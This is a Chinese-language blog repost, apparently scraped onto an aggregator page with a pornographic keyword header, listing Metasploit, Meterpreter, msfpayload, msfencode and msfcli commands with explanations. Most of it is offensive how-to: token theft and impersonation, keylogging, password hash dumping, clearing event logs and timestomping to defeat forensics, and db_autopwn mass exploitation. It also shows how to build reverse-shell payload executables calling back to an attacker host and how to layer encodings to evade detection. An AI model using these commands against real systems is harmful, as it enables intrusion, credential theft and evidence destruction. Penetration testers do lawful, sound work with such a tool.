日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

metasploit终端命令大全 MSF

發(fā)布時(shí)間:2024/1/23 编程问答 36 豆豆
生活随笔 收集整理的這篇文章主要介紹了 metasploit终端命令大全 MSF 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

metasploit終端命令大全 MSF
2012.10.9 No Comments

Metasploit是一款開(kāi)源的安全漏洞檢測(cè)工具,可以幫助安全和IT專(zhuān)業(yè)人士識(shí)別安全性問(wèn)題,驗(yàn)證漏洞的緩解措施,并管理專(zhuān)家驅(qū)動(dòng)的安全性進(jìn)行評(píng)估,提供真正的安全風(fēng)險(xiǎn)情報(bào)。這些功能包括智能開(kāi)發(fā),密碼審計(jì),Web應(yīng)用程序掃描,社會(huì)工程。團(tuán)隊(duì)合作,在Metasploit和綜合報(bào)告提出了他們的發(fā)現(xiàn)。

下面介紹下它的使用參數(shù):

show exploits
列出metasploit框架中的所有滲透攻擊模塊。

show payloads
列出metasploit框架中的所有攻擊載荷。

show auxiliary
列出metasploit框架中的所有輔助攻擊載荷。

search name
查找metasploit框架中所有的滲透攻擊和其他模塊。

info
展示出指定滲透攻擊或模塊的相關(guān)信息。

use name
裝載一個(gè)滲透攻擊或模塊。

LHOST
你本地可以讓目標(biāo)主機(jī)連接的IP地址,通常當(dāng)目標(biāo)主機(jī)不在同一個(gè)局域網(wǎng)內(nèi)時(shí),就需要是一個(gè)公共IP地址,特別為反彈式shell使用。

RHOST
遠(yuǎn)程主機(jī)或是目標(biāo)主機(jī)。

set function
設(shè)置特定的配置參數(shù)(EG:設(shè)置本地或遠(yuǎn)程主機(jī)參數(shù))。

setg function
以全局方式設(shè)置特定的配置參數(shù)(EG:設(shè)置本地或遠(yuǎn)程主機(jī)參數(shù))。

show options
列出某個(gè)滲透攻擊或模塊中所有的配置參數(shù)。

show targets
列出滲透攻擊所有支持的目標(biāo)平臺(tái)。

set target num
指定你所知道的目標(biāo)的操作系統(tǒng)以及補(bǔ)丁版本類(lèi)型。

set payload name
指定想要使用的攻擊載荷。

show advanced
列出所有高級(jí)配置選項(xiàng)。

set autorunscript migrate -f.
在滲透攻擊完成后,將自動(dòng)遷移到另一個(gè)進(jìn)程。

check
檢測(cè)目標(biāo)是否選定滲透攻擊存在相應(yīng)的安全漏洞。

exploit
執(zhí)行滲透攻擊或模塊來(lái)攻擊目標(biāo)。

exploit -j
在計(jì)劃任務(wù)下進(jìn)行滲透攻擊(攻擊將在后臺(tái)進(jìn)行)。

exploit -z
滲透攻擊完成后不與回話進(jìn)行交互。

exploit -e encoder
制定使用的攻擊載荷編碼方式(EG:exploit -e shikata_ga_nai)。

exploit -h
列出exploit命令的幫助信息。

sessions -l
列出可用的交互會(huì)話(在處理多個(gè)shell時(shí)使用)。

sessions -l -v
列出所有可用的交互會(huì)話以及詳細(xì)信息,EG:攻擊系統(tǒng)時(shí)使用了哪個(gè)安全漏洞。

sessions -s script
在所有活躍的metasploit會(huì)話中運(yùn)行一個(gè)特定的metasploit腳本。

sessions -K
殺死所有活躍的交互會(huì)話。

sessions -c cmd
在所有活躍的metasploit會(huì)話上執(zhí)行一個(gè)命令。

sessions -u sessionID
升級(jí)一個(gè)普通的win32 shell到metasploit shell。

db_create name
創(chuàng)建一個(gè)數(shù)據(jù)庫(kù)驅(qū)動(dòng)攻擊所要使用的數(shù)據(jù)庫(kù)(EG:db_create autopwn)。

db_connect name
創(chuàng)建并連接一個(gè)數(shù)據(jù)庫(kù)驅(qū)動(dòng)攻擊所要使用的數(shù)據(jù)庫(kù)(EG:db_connect user:passwd@ip/sqlname)。

db_namp
利用nmap并把掃描數(shù)據(jù)存儲(chǔ)到數(shù)據(jù)庫(kù)中(支持普通的nmap語(yǔ)句,EG:-sT -v -P0)。

db_autopwn -h
展示出db_autopwn命令的幫助信息。

db_autopwn -p -r -e
對(duì)所有發(fā)現(xiàn)的開(kāi)放端口執(zhí)行db_autopwn,攻擊所有系統(tǒng),并使用一個(gè)反彈式shell。

db_destroy
刪除當(dāng)前數(shù)據(jù)庫(kù)。

db_destroy user:passwd@host:port/database
使用高級(jí)選項(xiàng)來(lái)刪除數(shù)據(jù)庫(kù)。

metasploit命令

help
打開(kāi)meterpreter使用幫助。

run scriptname
運(yùn)行meterpreter腳本,在scripts/meterpreter目錄下可查看到所有腳本名。

sysinfo
列出受控主機(jī)的系統(tǒng)信息。

ls
列出目標(biāo)主機(jī)的文件和文件夾信息。

use priv
加載特權(quán)提升擴(kuò)展模塊,來(lái)擴(kuò)展metasploit庫(kù)。

ps
顯示所有運(yùn)行的進(jìn)程以及相關(guān)聯(lián)的用戶(hù)賬戶(hù)。

migrate PID
遷移到一個(gè)指定的進(jìn)程ID(PID號(hào)可通過(guò)ps命令從主機(jī)上獲得)。

use incognito
加載incognito功能(用來(lái)盜竊目標(biāo)主機(jī)的令牌或假冒用戶(hù))

list_tokens -u
列出目標(biāo)主機(jī)用戶(hù)的可用令牌。

list_tokens -g
列出目標(biāo)主機(jī)用戶(hù)組的可用令牌。

impersonate_token DOMAIN_NAME\USERNAME
假冒目標(biāo)主機(jī)上的可用令牌。

steal_token PID
盜竊給定進(jìn)程的可用令牌并進(jìn)行令牌假冒。

drop_token
停止假冒當(dāng)前令牌。

getsystem
通過(guò)各種攻擊向量來(lái)提升系統(tǒng)用戶(hù)權(quán)限。

execute -f cmd.exe -i
執(zhí)行cmd.exe命令并進(jìn)行交互。

execute -f cmd.exe -i -t
以所有可用令牌來(lái)執(zhí)行cmd命令并隱藏該進(jìn)程。

rev2self
回到控制目標(biāo)主機(jī)的初始用戶(hù)賬戶(hù)下。

reg command
在目標(biāo)主機(jī)注冊(cè)表中進(jìn)行交互,創(chuàng)建,刪除,查詢(xún)等操作。

setdesktop number
切換到另一個(gè)用戶(hù)界面(該功能基于那些用戶(hù)已登錄)。

screenshot
對(duì)目標(biāo)主機(jī)的屏幕進(jìn)行截圖。

upload file
向目標(biāo)主機(jī)上傳文件。

download file
從目標(biāo)主機(jī)下載文件。

keyscan_start
針對(duì)遠(yuǎn)程目標(biāo)主機(jī)開(kāi)啟鍵盤(pán)記錄功能。

keyscan_dump
存儲(chǔ)目標(biāo)主機(jī)上捕獲的鍵盤(pán)記錄。

keyscan_stop
停止針對(duì)目標(biāo)主機(jī)的鍵盤(pán)記錄。

getprivs
盡可能多的獲取目標(biāo)主機(jī)上的特權(quán)。

uictl enable keyboard/mouse
接管目標(biāo)主機(jī)的鍵盤(pán)和鼠標(biāo)。

background
將你當(dāng)前的metasploit shell轉(zhuǎn)為后臺(tái)執(zhí)行。

hashdump
導(dǎo)出目標(biāo)主機(jī)中的口令哈希值。

use sniffer
加載嗅探模式。

sniffer_interfaces
列出目標(biāo)主機(jī)所有開(kāi)放的網(wǎng)絡(luò)端口。

sniffer_dump interfaceID pcapname
在目標(biāo)主機(jī)上啟動(dòng)嗅探。

sniffer_start interfaceID packet-buffer
在目標(biāo)主機(jī)上針對(duì)特定范圍的數(shù)據(jù)包緩沖區(qū)啟動(dòng)嗅探。

sniffer_stats interfaceID
獲取正在實(shí)施嗅探網(wǎng)絡(luò)接口的統(tǒng)計(jì)數(shù)據(jù)。

sniffer_stop interfaceID
停止嗅探。

add_user username password -h ip
在遠(yuǎn)程目標(biāo)主機(jī)上添加一個(gè)用戶(hù)。

clearev
清楚目標(biāo)主機(jī)上的日志記錄。

timestomp
修改文件屬性,例如修改文件的創(chuàng)建時(shí)間(反取證調(diào)查)。

reboot
重啟目標(biāo)主機(jī)。

MSFpayload命令

msfpayload -h
msfpayload的幫助信息。
msfpayload windows/meterpreter/bind_tcp O
列出所有windows/meterpreter/bind_tcp下可用的攻擊載荷的配置項(xiàng)(任何攻擊載荷都是可用配置的)。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe
創(chuàng)建一個(gè)metasploit的reverse_tcp攻擊載荷,回連到LHOSTip的LPORT,將其保存為名為payload.exe的windows下可執(zhí)行程序。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw
創(chuàng)建一個(gè)metasploit的reverse_tcp攻擊載荷,回連到LHOSTip的LPORT,將其保存為名為payload.raw,該文件后面的msffencode中使用。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c
創(chuàng)建一個(gè)metasploit的reverse_tcp攻擊載荷,導(dǎo)出C格式的shellcode。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java
創(chuàng)建一個(gè)metasploit的reverse_tcp攻擊載荷,導(dǎo)出成以%u編碼方式的javaScript語(yǔ)言字符串。

msfencode命令
mefencode -h
列出msfencode的幫助命令。
msfencode -l
列出所有可用的編碼器。
msfencode -t (c,elf,exe,java,is_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)
顯示編碼緩沖區(qū)的格式。
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
使用shikata_ga_nai編碼器對(duì)payload.raw文件進(jìn)行5編碼,然后導(dǎo)出一個(gè)名為encoded_payload.exe的文件。
msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
創(chuàng)建一個(gè)經(jīng)過(guò)多種編碼格式嵌套編碼的攻擊載荷。
msfencode -i payload.raw BufferRegister=ESI -e x86/alpja_mixed -t c
創(chuàng)建一個(gè)純字母數(shù)字的shellcode,由ESI寄存器只想shellcode,以C語(yǔ)言格式輸出。
MSFcli命令
msfcli | grep exploit
僅列出滲透攻擊模塊。
msfcli | grep exploit/windows
僅列出與windows相關(guān)的滲透攻擊模塊。
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
對(duì)IP發(fā)起ms08_067_netapi滲透攻擊,配置了bind_tcp攻擊載荷,并綁定在PORT端口進(jìn)行監(jiān)聽(tīng)。

轉(zhuǎn)載文章請(qǐng)注明,轉(zhuǎn)載自:小馬’s Blog https://www.i0day.com

本文鏈接: https://www.i0day.com/1182.html

總結(jié)

以上是生活随笔為你收集整理的metasploit终端命令大全 MSF的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。